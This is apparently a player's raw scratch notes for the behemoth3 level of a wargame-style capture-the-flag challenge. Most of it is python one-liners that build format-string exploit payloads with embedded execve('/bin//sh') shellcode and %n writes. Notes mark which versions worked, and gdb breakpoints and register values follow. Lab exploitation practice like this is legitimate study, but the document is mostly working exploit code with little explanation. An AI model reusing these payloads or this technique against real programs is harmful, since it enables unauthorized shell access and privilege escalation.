
4 * 5 = 20

20 + 23 = 43

2 + 8 + 8 + 8 + 8 = 34

4 + 5 + 4 + 4 + 4 = 21

21 + 34 + 43 + 20 = 118 0x76



qira!!!

(python -c'print "\x8c\xef\xff\xf6" + "\x90"*4 + "\x8d\xef\xff\xf6" + "\x90"*4 + "\x8f\xef\xff\xf6" + "\x8e\xef\xff\xf6" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "%x"*4 + "%74x" + "%n" + "%7x" + "%n" + "%9x" + "%n%n"'; cat)| qira ./behemoth3




melinda shellcode d570, stack d540   change ebp to start of shellcode
(python -c'print "\x28\xd6\xff\xff" + "\x90"*4 + "\x29\xd6\xff\xff" + "\x90"*4 + "\x2a\xd6\xff\xff" + "\x2b\xd6\xff\xff" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "%x"*4 + "%53x" + "%n" + "%101x" + "%n" + "%42x" + "%n%n"'; cat)| ./behemoth3

works in gdb
python -c'print "\x2c\xd6\xff\xff" + "\x90"*4 + "\x2d\xd6\xff\xff" + "\x90"*4 + "\x2e\xd6\xff\xff" + "\x2f\xd6\xff\xff" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "%x"*4 + "%39x" + "%n" + "%101x" + "%n" + "%42x" + "%n%n"'

Works in real life!!!!!!
 ( python -c'print "\x4c\xd6\xff\xff" + "\x90"*4 + "\x4d\xd6\xff\xff" + "\x90"*4 + "\x4e\xd6\xff\xff" + "\x4f\xd6\xff\xff" + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "%x"*4 + "%71x" + "%n" + "%69x" + "%n" + "%42x" + "%n%n"' ; cat) | ./behemoth3




melinda! shellcode d590 stack d560

(python -c'print "\x2c\xd6\xff\xff" + "\x90"*4 + "\x2d\xd6\xff\xff" + "\x90"*4 + "\x2e\xd6\xff\xff" + "\x2f\xd6\xff\xff" + "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" + "%x"*4 + "%82x" + "%n" + "%69x" + "%n" + "%42x" + "%n%n"'; cat)| ./behemoth3

b *0x8048493
b *0x80484a4
r < /tmp/a20/nr3_



ins 0x0804849f

esp = ffffd540		
ebp = ffffd628		val 0x0

ins 0x080484a4

esp = ffffd62c		val f7e444b3
ebp = 00000000		from value in ffffd628

ins 0x08048a5











													   
